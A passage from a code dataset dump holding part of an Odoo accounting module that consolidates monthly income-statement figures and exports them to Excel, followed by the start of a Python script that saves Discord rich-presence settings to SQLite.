(self.acum_anio * 100.0) / tmp ) if tmp != 0 else 0\n\n\n\tacum_anio = fields.Float('Acumulado Soles',compute=\"get_acum_anio\",digits=(12,2))\n\tacum_porc = fields.Float('Porcentaje Acumulado',compute=\"get_acum_porc\",digits=(12,2))\n\t##porcentaje_mes\n\n\n\tpadre = fields.Many2one('consolidado.rm.resultado.mexicano','Cabezera')\n\n\n\n\nclass consolidado_rm_resultado_mexicano(models.Model):\n\t_name= 'consolidado.rm.resultado.mexicano'\n\n\tfiscal_id = fields.Many2one('account.fiscalyear','Año Fiscal',required=True)\n\tperiodo_ini = fields.Many2one('account.period','Periodo',required=True)\n\ttipo_cambio = fields.Float('Tipo Cambio',digits=(12,3))\n\n\ttipo_cambio1 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio2 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio3 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio4 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio5 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio6 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio7 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio8 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio9 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio10 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio11 = fields.Float('Tipo Cambio',digits=(12,3))\n\ttipo_cambio12 = fields.Float('Tipo Cambio',digits=(12,3))\n\n\tlineas = fields.One2many('consolidado.rm.resultado.mexicano.line','padre','Lineas')\n\n\t_rec_name = 'periodo_ini'\n\n\n\t@api.one\n\tdef traer_datos(self):\n\t\tt_i = self.env['rm.resultado.config.mexicano.line'].search([])\n\t\tif len(t_i) >0 :\n\t\t\tpass\n\t\telse:\n\t\t\traise osv.except_osv('Alerta!', \"No hay plantilla configurada\")\n\n\t\tfor i in self.lineas:\n\t\t\ti.unlink()\n\n\t\tfor i in t_i:\n\t\t\tvals = {\n\t\t\t\t'orden': i.orden, \n\t\t\t\t'concepto' : i.concepto,\n\t\t\t\t'tipo_cuenta' :i.tipo_cuenta,\n\t\t\t\t'formula' :i.formula,\n\t\t\t\t'total' :i.total,\n\t\t\t\t'resaltado' :i.resaltado,\n\t\t\t\t'bordes' :i.bordes,\n\t\t\t\t'enero' :0,\n\t\t\t\t'febrero' :0,\n\t\t\t\t'marzo' :0,\n\t\t\t\t'abril' :0,\n\t\t\t\t'mayo' :0,\n\t\t\t\t'junio' :0,\n\t\t\t\t'julio' :0,\n\t\t\t\t'agosto' :0,\n\t\t\t\t'septiembre' :0,\n\t\t\t\t'octubre' :0,\n\t\t\t\t'noviembre' :0,\n\t\t\t\t'diciembre' :0,\n\t\t\t\t'porc_enero' :0,\n\t\t\t\t'porc_febrero' :0,\n\t\t\t\t'porc_marzo' :0,\n\t\t\t\t'porc_abril' :0,\n\t\t\t\t'porc_mayo' :0,\n\t\t\t\t'porc_junio' :0,\n\t\t\t\t'porc_julio' :0,\n\t\t\t\t'porc_agosto' :0,\n\t\t\t\t'porc_septiembre' :0,\n\t\t\t\t'porc_octubre' :0,\n\t\t\t\t'porc_noviembre' :0,\n\t\t\t\t'porc_diciembre' :0,\n\t\t\t\t'padre': self.id,\n\t\t\t}\n\t\t\tself.env['consolidado.rm.resultado.mexicano.line'].create(vals)\n\n\n\t\tself.refresh()\n\n\n\n\t\tperiod_list = []\n\t\tnro_act = 1\n\t\tperiod_act = (\"%2d\"%nro_act).replace(' ','0') + '/' + self.fiscal_id.name\n\t\tnro_act = 2\n\t\tmkmk = self.env['account.period'].search( [('code','=',period_act)] )\n\t\tif len(mkmk)>0:\n\t\t\tperiod_list.append(mkmk[0])\n\n\t\twhile period_act != self.periodo_ini.code :\n\t\t\tperiod_act = (\"%2d\"%nro_act).replace(' ','0') + '/' + self.fiscal_id.name\n\t\t\tnro_act += 1\n\t\t\tmkmk = self.env['account.period'].search( [('code','=',period_act)] )\n\t\t\tif len(mkmk)>0:\n\t\t\t\tperiod_list.append(mkmk[0])\n\n\t\tfor i in period_list:\n\t\t\tt = self.env['rm.resultado.mexicano'].search( [('periodo_fin','=',i.id)] )\n\t\t\tif len(t)>0:\n\t\t\t\tt = t[0]\n\t\t\t\tfor line in self.lineas:\n\t\t\t\t\tfor j in self.env['rm.resultado.mexicano.line'].search([('orden','=',line.orden),('padre','=',t.id),('concepto','=',line.concepto),('tipo_cuenta','=',line.tipo_cuenta)]):\n\t\t\t\t\t\tif i.code.split('/')[0] == '01':\n\t\t\t\t\t\t\tline.enero = j.monto_mes\n\t\t\t\t\t\t\tline.porc_enero = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio1 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '02':\n\t\t\t\t\t\t\tline.febrero = j.monto_mes\n\t\t\t\t\t\t\tline.porc_febrero = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio2 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '03':\n\t\t\t\t\t\t\tline.marzo = j.monto_mes\n\t\t\t\t\t\t\tline.porc_marzo = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio3 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '04':\n\t\t\t\t\t\t\tline.abril = j.monto_mes\n\t\t\t\t\t\t\tline.porc_abril = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio4 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '05':\n\t\t\t\t\t\t\tline.mayo = j.monto_mes\n\t\t\t\t\t\t\tline.porc_mayo = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio5 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '06':\n\t\t\t\t\t\t\tline.junio = j.monto_mes\n\t\t\t\t\t\t\tline.porc_junio = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio6 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '07':\n\t\t\t\t\t\t\tline.julio = j.monto_mes\n\t\t\t\t\t\t\tline.porc_julio = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio7 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '08':\n\t\t\t\t\t\t\tline.agosto = j.monto_mes\n\t\t\t\t\t\t\tline.porc_agosto = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio8 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '09':\n\t\t\t\t\t\t\tline.septiembre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_septiembre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio9 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '10':\n\t\t\t\t\t\t\tline.octubre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_octubre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio10 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '11':\n\t\t\t\t\t\t\tline.noviembre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_noviembre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio11 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '12':\n\t\t\t\t\t\t\tline.diciembre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_diciembre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio12 = j.padre.tipo_cambio\n\n\n\t\"\"\" ----------------------------- REPORTE EXCEL ----------------------------- \"\"\"\n\n\t@api.multi\n\tdef export_excel(self):\n\t\timport io\n\t\tfrom xlsxwriter.workbook import Workbook\n\n\t\timport sys\n\t\treload(sys)\n\t\tsys.setdefaultencoding('iso-8859-1')\n\n\t\toutput = io.BytesIO()\n\t\t########### PRIMERA HOJA DE LA DATA EN TABLA\n\t\t#workbook = Workbook(output, {'in_memory': True})\n\n\t\tdireccion = self.env['main.parameter'].search([])[0].dir_create_file\n\t\tif not direccion:\n\t\t\traise osv.except_osv('Alerta!', u\"No fue configurado el directorio para los archivos en Configuracion.\")\n\n\t\tworkbook = Workbook(direccion +'Reporte_resultado_mexicano.xlsx')\n\t\tworksheet = workbook.add_worksheet(u\"Consolidado Resultado\")\n\t\tbold = workbook.add_format({'bold': True})\n\t\tnormal = workbook.add_format()\n\t\tboldbord = workbook.add_format({'bold': True})\n\t\tboldbord.set_border(style=2)\n\t\tboldbord.set_align('center')\n\t\tboldbord.set_align('vcenter')\n\t\tboldbord.set_text_wrap()\n\t\tboldbord.set_font_size(9)\n\t\tboldbord.set_bg_color('#DCE6F1')\n\t\tnumbertres = workbook.add_format({'num_format':'0.000'})\n\t\tnumberdos = workbook.add_format({'num_format':'#,##0.00'})\n\t\tbord = workbook.add_format()\n\t\tbord.set_border(style=1)\n\t\tnumberdos.set_border(style=1)\n\t\tnumbertres.set_border(style=1)\t\n\n\t\tboldtotal = workbook.add_format({'bold': True})\n\t\tboldtotal.set_align('right')\n\t\tboldtotal.set_align('vright')\n\n\t\tmerge_format = workbook.add_format({\n\t\t\t\t\t\t\t\t\t\t\t'bold': 1,\n\t\t\t\t\t\t\t\t\t\t\t'border': 1,\n\t\t\t\t\t\t\t\t\t\t\t'align': 'center',\n\t\t\t\t\t\t\t\t\t\t\t'valign': 'vcenter',\n\t\t\t\t\t\t\t\t\t\t\t})\t\n\t\tmerge_format.set_bg_color('#DCE6F1')\n\t\tmerge_format.set_text_wrap()\n\t\tmerge_format.set_font_size(9)\n\n\n\t\tworksheet.insert_image('A2', 'calidra.jpg')\n\t\tworksheet.write(1,4, u'CALQUIPA {0}'.format(self.periodo_ini.code.split('/')[1]), bold)\n\t\tworksheet.write(3,4, 'Estado de Resultados', bold)\n\t\tworksheet.write(4,4, u'{0}'.format(self.periodo_ini.code.split('/')[1]), bold)\n\t\t\n\t\ttitlees = workbook.add_format({'bold': True})\n\t\ttitlees.set_align('center')\n\t\ttitlees.set_align('vcenter')\n\t\t\n\t\t#worksheet.merge_range(6,0,7,0,u'Nombre', boldbord)\n\n\t\tworksheet.merge_range(6,1,6,3, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio1), titlees)\n\t\tworksheet.merge_range(7,1,7,3, u'Enero', titlees)\n\t\tworksheet.write(8,1, u'Soles', titlees)\n\t\tworksheet.write(8,2, u'USD', titlees)\n\t\tworksheet.write(8,3, u'%', titlees)\n\n\t\tworksheet.merge_range(6,4,6,6, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio2), titlees)\n\t\tworksheet.merge_range(7,4,7,6, u'Febrero', titlees)\n\t\tworksheet.write(8,4, u'Soles', titlees)\n\t\tworksheet.write(8,5, u'USD', titlees)\n\t\tworksheet.write(8,6, u'%', titlees)\n\n\t\tworksheet.merge_range(6,7,6,9, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio3), titlees)\n\t\tworksheet.merge_range(7,7,7,9, u'Marzo', titlees)\n\t\tworksheet.write(8,7, u'Soles', titlees)\n\t\tworksheet.write(8,8, u'USD', titlees)\n\t\tworksheet.write(8,9, u'%', titlees)\n\n\t\tworksheet.merge_range(6,10,6,12, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio4), titlees)\n\t\tworksheet.merge_range(7,10,7,12, u'Abril', titlees)\n\t\tworksheet.write(8,10, u'Soles', titlees)\n\t\tworksheet.write(8,11, u'USD', titlees)\n\t\tworksheet.write(8,12, u'%', titlees)\n\n\t\tworksheet.merge_range(6,13,6,15, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio5), titlees)\n\t\tworksheet.merge_range(7,13,7,15, u'Mayo', titlees)\n\t\tworksheet.write(8,13, u'Soles', titlees)\n\t\tworksheet.write(8,14, u'USD', titlees)\n\t\tworksheet.write(8,15, u'%', titlees)\n\n\t\tworksheet.merge_range(6,16,6,18, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio6), titlees)\n\t\tworksheet.merge_range(7,16,7,18, u'Junio', titlees)\n\t\tworksheet.write(8,16, u'Soles', titlees)\n\t\tworksheet.write(8,17, u'USD', titlees)\n\t\tworksheet.write(8,18, u'%', titlees)\n\n\t\tworksheet.merge_range(6,19,6,21, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio7), titlees)\n\t\tworksheet.merge_range(7,19,7,21, u'Julio', titlees)\n\t\tworksheet.write(8,19, u'Soles', titlees)\n\t\tworksheet.write(8,20, u'USD', titlees)\n\t\tworksheet.write(8,21, u'%', titlees)\n\n\t\tworksheet.merge_range(6,22,6,24, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio8), titlees)\n\t\tworksheet.merge_range(7,22,7,24, u'Agosto', titlees)\n\t\tworksheet.write(8,22, u'Soles', titlees)\n\t\tworksheet.write(8,23, u'USD', titlees)\n\t\tworksheet.write(8,24, u'%', titlees)\n\n\t\tworksheet.merge_range(6,25,6,27, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio9), titlees)\n\t\tworksheet.merge_range(7,25,7,27, u'Septiembre', titlees)\n\t\tworksheet.write(8,25, u'Soles', titlees)\n\t\tworksheet.write(8,26, u'USD', titlees)\n\t\tworksheet.write(8,27, u'%', titlees)\n\n\t\tworksheet.merge_range(6,28,6,30, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio10), titlees)\n\t\tworksheet.merge_range(7,28,7,30, u'Octubre', titlees)\n\t\tworksheet.write(8,28, u'Soles', titlees)\n\t\tworksheet.write(8,29, u'USD', titlees)\n\t\tworksheet.write(8,30, u'%', titlees)\n\n\t\tworksheet.merge_range(6,31,6,33, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio11), titlees)\n\t\tworksheet.merge_range(7,31,7,33, u'Noviembre', titlees)\n\t\tworksheet.write(8,31, u'Soles', titlees)\n\t\tworksheet.write(8,32, u'USD', titlees)\n\t\tworksheet.write(8,33, u'%', titlees)\n\n\t\tworksheet.merge_range(6,34,6,36, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio12), titlees)\n\t\tworksheet.merge_range(7,34,7,36, u'Diciembre', titlees)\n\t\tworksheet.write(8,34, u'Soles', titlees)\n\t\tworksheet.write(8,35, u'USD', titlees)\n\t\tworksheet.write(8,36, u'%', titlees)\n\t\t\t\t\n\t\tworksheet.merge_range(6,37,6,39, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio), titlees)\n\t\tworksheet.merge_range(7,37,7,39, u'Acumulado', titlees)\n\t\tworksheet.write(8,37, u'Soles', titlees)\n\t\tworksheet.write(8,38, u'USD', titlees)\n\t\tworksheet.write(8,39, u'%', titlees)\n\t\t\t\t\n\t\tx = 9\n\n\t\tfor i in self.env['consolidado.rm.resultado.mexicano.line'].search([('padre','=',self.id)]).sorted(lambda r : r.orden):\n\t\t\tif i.tipo_cuenta == '5':\n\n\t\t\t\tboldbordtmp = workbook.add_format({'bold': False})\n\t\t\t\tboldbordtmp.set_font_size(9)\n\t\t\t\tif i.resaltado:\n\t\t\t\t\tboldbordtmp = workbook.add_format({'bold': True})\n\t\t\t\t\tboldbordtmp.set_text_wrap()\n\t\t\t\t\tboldbordtmp.set_font_size(9)\n\t\t\t\tif i.bordes:\n\t\t\t\t\tboldbordtmp.set_border(style=2)\n\t\t\t\tworksheet.write(x,0, i.concepto if i.concepto else '',boldbordtmp)\n\t\t\t\tx+=1\n\t\t\telse:\t\t\t\n\t\t\t\tboldbordtmp = workbook.add_format({'bold': False})\n\t\t\t\tboldbordtmp.set_font_size(9)\n\t\t\t\tboldbordtmpRight = workbook.add_format({'bold': False})\n\t\t\t\tboldbordtmpRight.set_font_size(9)\n\t\t\t\tboldbordtmpRight.set_align('right')\n\t\t\t\tboldbordtmpRight.set_align('vright')\n\t\t\t\tnumberdostmp = workbook.add_format({'num_format':'#,##0.00'})\n\t\t\t\tnumberdostmp.set_font_size(9)\n\t\t\t\tif i.resaltado:\n\t\t\t\t\tboldbordtmp = workbook.add_format({'bold': True})\n\t\t\t\t\tboldbordtmp.set_text_wrap()\n\t\t\t\t\tboldbordtmp.set_font_size(9)\n\n\t\t\t\t\tboldbordtmpRight = workbook.add_format({'bold': True})\n\t\t\t\t\tboldbordtmpRight.set_text_wrap()\n\t\t\t\t\tboldbordtmpRight.set_align('right')\n\t\t\t\t\tboldbordtmpRight.set_align('vright')\n\t\t\t\t\tboldbordtmpRight.set_font_size(9)\n\n\t\t\t\t\tnumberdostmp = workbook.add_format({'bold': True})\n\t\t\t\t\tnumberdostmp.set_text_wrap()\n\t\t\t\t\tnumberdostmp.set_font_size(9)\n\t\t\t\tif i.bordes:\n\t\t\t\t\tboldbordtmp.set_border(style=2)\n\t\t\t\t\tnumberdostmp.set_border(style=2)\n\n\t\t\t\t\tboldbordtmpRight.set_border(style=2)\n\n\t\t\t\tif True:\n\t\t\t\t\tworksheet.write(x,0, i.concepto if i.concepto else '',boldbordtmp)\n\t\t\t\t\tworksheet.write(x,1, i.enero ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,2, i.enero / self.tipo_cambio1 if self.tipo_cambio1 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,3, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_enero)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,4, i.febrero ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,5, i.febrero / self.tipo_cambio2 if self.tipo_cambio2 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,6, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_febrero)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,7, i.marzo ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,8, i.marzo / self.tipo_cambio3 if self.tipo_cambio3 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,9, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_marzo)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,10, i.abril ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,11, i.abril / self.tipo_cambio4 if self.tipo_cambio4 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,12, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_abril)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,13, i.mayo ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,14, i.mayo / self.tipo_cambio5 if self.tipo_cambio5 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,15, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_mayo)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,16, i.junio ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,17, i.junio / self.tipo_cambio6 if self.tipo_cambio6 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,18, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_junio)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,19, i.julio ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,20, i.julio / self.tipo_cambio7 if self.tipo_cambio7 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,21, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_julio)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,22, i.agosto ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,23, i.agosto / self.tipo_cambio8 if self.tipo_cambio8 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,24, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_agosto)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,25, i.septiembre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,26, i.septiembre / self.tipo_cambio9 if self.tipo_cambio9 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,27, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_septiembre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,28, i.octubre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,29, i.octubre / self.tipo_cambio10 if self.tipo_cambio10 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,30, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_octubre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,31, i.noviembre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,32, i.noviembre / self.tipo_cambio11 if self.tipo_cambio11 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,33, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_noviembre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,34, i.diciembre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,35, i.diciembre / self.tipo_cambio12 if self.tipo_cambio12 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,36, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_diciembre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,37, i.acum_anio ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,38, i.acum_anio / self.tipo_cambio if self.tipo_cambio != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,39, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.acum_porc)) +\" %\",boldbordtmpRight)\n\n\n\t\t\t\t\tx += 1\n\n\t\tt = 14.86\n\t\tworksheet.set_column('A:A', 49)\n\t\tworksheet.set_column('B:B', t)\n\t\tworksheet.set_column('C:C', t)\n\t\tworksheet.set_column('D:D', t)\n\t\tworksheet.set_column('E:E', t)\n\t\tworksheet.set_column('F:F', t)\n\t\tworksheet.set_column('G:G', t)\n\t\tworksheet.set_column('H:H', t)\n\t\tworksheet.set_column('I:I', t)\n\t\tworksheet.set_column('J:J', t)\n\t\tworksheet.set_column('K:K', t)\n\t\tworksheet.set_column('L:L', t)\n\t\tworksheet.set_column('M:M', t)\n\t\tworksheet.set_column('N:N', t)\n\t\tworksheet.set_column('O:O', t)\n\t\tworksheet.set_column('P:P', t)\n\t\tworksheet.set_column('Q:Q', t)\n\t\tworksheet.set_column('R:R', t)\n\t\tworksheet.set_column('S:S', t)\n\t\tworksheet.set_column('T:T', t)\n\t\tworksheet.set_column('U:U', t)\n\t\tworksheet.set_column('V:V', t)\n\t\tworksheet.set_column('W:W', t)\n\t\tworksheet.set_column('X:X', t)\n\t\tworksheet.set_column('Y:Y', t)\n\t\tworksheet.set_column('Z:Z', t)\n\t\tworksheet.set_column('AA:AA', t)\n\t\tworksheet.set_column('AB:AB', t)\n\t\tworksheet.set_column('AC:AC', t)\n\t\tworksheet.set_column('AD:AD', t)\n\t\tworksheet.set_column('AE:AE', t)\n\t\tworksheet.set_column('AF:AF', t)\n\t\tworksheet.set_column('AG:AG', t)\n\t\tworksheet.set_column('AH:AH', t)\n\t\tworksheet.set_column('AI:AI', t)\n\t\tworksheet.set_column('AJ:AJ', t)\n\t\tworksheet.set_column('AK:AK', t)\n\t\tworksheet.set_column('AL:AL', t)\n\t\tworksheet.set_column('AM:AM', t)\n\t\tworksheet.set_column('AN:AN', t)\n\n\t\tworkbook.close()\n\t\t\n\t\tf = open(direccion + 'Reporte_resultado_mexicano.xlsx', 'rb')\n\t\t\n\t\tvals = {\n\t\t\t'output_name': 'Consolidado Mexicanos Resultado.xlsx',\n\t\t\t'output_file': base64.encodestring(''.join(f.readlines())),\t\t\n\t\t}\n\n\t\tsfs_id = self.env['export.file.save'].create(vals)\n\t\treturn {\n\t\t\t\"type\": \"ir.actions.act_window\",\n\t\t\t\"res_model\": \"export.file.save\",\n\t\t\t\"views\": [[False, \"form\"]],\n\t\t\t\"res_id\": sfs_id.id,\n\t\t\t\"target\": \"new\",\n\t\t}\n\n\t\"\"\" ----------------------------- REPORTE EXCEL ----------------------------- \"\"\"","sub_path":"calquipa_reportemexicanos_parte1_it/reporte_consolidado_resultado.py","file_name":"reporte_consolidado_resultado.py","file_ext":"py","file_size_in_byte":22291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"56266728","text":"import time\nimport sqlite3\n\ndef set_up(cID):\n\tactivity = {\"startTimestamp\":time.time()}\n\tactivityKey = [\"state\", \"details\", \"largeImageKey\", \"largeImageText\", \"smallImageKey\", \"smallImageText\"]\n\n\tfor i in activityKey:\n\t\tanswer = input(f\"Enter {i} = \")\n\t\tactivity[i]=answer if not answer=='' else None\n\n\tbutton = input(\"Do you want set a button (yes/no) = \")\n\tif button.lower()=='yes' or button.lower()=='y':\n\t\tactivity[\"buttons\"]=[]\n\t\tfor i in range(2):\n\t\t\tnums = ['st','nd']\n\t\t\twhile True:\n\t\t\t\tlabel = input(f\"Enter the LABEL for {i+1}{nums[i]} button = \")\n\t\t\t\tif label=='':\n\t\t\t\t\tprint(\"LABEL cannot be empty please input again. \")\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\twhile True:\n\t\t\t\tbuttonLink = input(f\"Enter the URL for {i+1}{nums[i]} button = \")\n\t\t\t\tif label=='':\n\t\t\t\t\tprint(\"URL cannot be empty please input again. \")\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\tnewButton = {\"label\":label,\"url\":buttonLink}\n\t\t\tactivity[\"buttons\"].append(newButton)\n\t\t\tif i==0:\n\t\t\t\tbutton = input(\"Do you want a second button? (yes/no) = \")\n\t\t\t\tif button.lower()=='yes' or button.lower()=='y':\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\tif len(activity['buttons'])==0:\n\t\t\tactivity['buttons']=None\n\telse:\n\t\tactivity['buttons']=None\n\tsave_data(activity, cID)\n\n\treturn activity\n\ndef save_data(activity, cID):\n\tcon = sqlite3.connect('database.db')\n\tc = con.cursor()\n\tselect = c.execute('''SELECT name FROM sqlite_master WHERE type='table' AND name=\"discord\"''')\n\tif len(select.fetchall())==0:\n\t\tc.execute('''CREATE TABLE discord(id INT, clientid INT,details TEXT, state TEXT, largeImageKey TEXT, largeImageText TEXT, smallImageKey TEXT, smallImageText TEXT, btlbl1 TEXT, bturl1 TEXT, btlbl2 TEXT, bturl2 TEXT)''')\n\t\tcon.commit()\n\tif activity['buttons']==None:\n\t\tactivity['btlbl1']=\"\"\n\t\tactivity['bturl1']=\"\"\n\t\tactivity['btlbl2']=\"\"\n\t\tactivity['bturl2']=\"\"\n\telse:\n\t\tif(len(activity)==1):\n\t\t\tactivity['btlbl1']=activity['buttons'][0]['label']\n\t\t\tactivity['bturl1']=activity['buttons'][0]['url']\n\t\t\tactivity['btlbl2']=\"\"\n\t\t\tactivity['bturl2']=\"\"\n\t\telse:\n\t\t\tactivity['btlbl1']=activity['buttons'][0]['label']\n\t\t\tactivity['bturl1']=activity['buttons'][0]['url']\n\t\t\tactivity['btlbl2']=activity['buttons'][1]['label']\n\t\t\tactivity['bturl2']=activity['buttons'][1]['url']\n\n\ttask = (cID, activity['details'], activity['state'],activity['largeImageKey'],activity['largeImageText'],activity['smallImageKey'],activity['smallImageText'],activity['btlbl1'],activity['bturl1'],activity['btlbl2'],activity['bturl2'])\n\tselect = c.execute('''SELECT id FROM discord WHERE id=1''').fetchone()\n\tif select==None:\n\t\tsql = '''INSERT INTO discord(id,clientid,details,state,largeImageKey,largeImageText,smallImageKey,smallImageText,btlbl1,bturl1,btlbl2,bturl2) VALUES(1, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'''\n\telse:\n\t\tsql = '''UPDATE discord SET clientid=?, details=?, state=?, largeImageKey=?, largeImageText=?, smallImageKey=?, smallImageText=?, btlbl1=?, bturl1=?, btlbl2=?, bturl2=? WHERE id=1'''\n\tc.execute(sql,task)\n\tcon.commit()\n\tcon.close()\n\ndef storage():\n\tcon = sqlite3.connect('database.db')\n\tc = con.cursor()\n\tselect = c.execute('''SELECT name FROM sqlite_master WHERE type='table' AND name=\"discord\"''')\n\tif len(select.fetchall())==0:\n\t\tc.execute('''CREATE TABLE discord(id INT, clientid INT,details TEXT, state TEXT, largeImageKey TEXT, largeImageText TEXT, smallImageKey TEXT, smallImageText TEXT, btlbl1 TEXT, bturl1 TEXT, btlbl2 TEXT, bturl2 TEXT)''')\n\t\tcon.commit()\n\tselect = c.execute('''SELECT * FROM discord WHERE id=1''').fetchone()\n\tif select==None:\n\t\twhile True:\n\t\t\tcID = input(\"Enter client id = \")\n\t\t\tif not cID.isdigit():\n\t\t\t\tprint(\"Client Id can only be integer = \")\n\t\t\telse:\n\t\t\t\tbreak\n\t\tc.execute('''INSERT INTO discord(id,clientid,details,state,largeImageKey,largeImageText,smallImageKey,smallImageText,btlbl1,bturl1,btlbl2,bturl2) 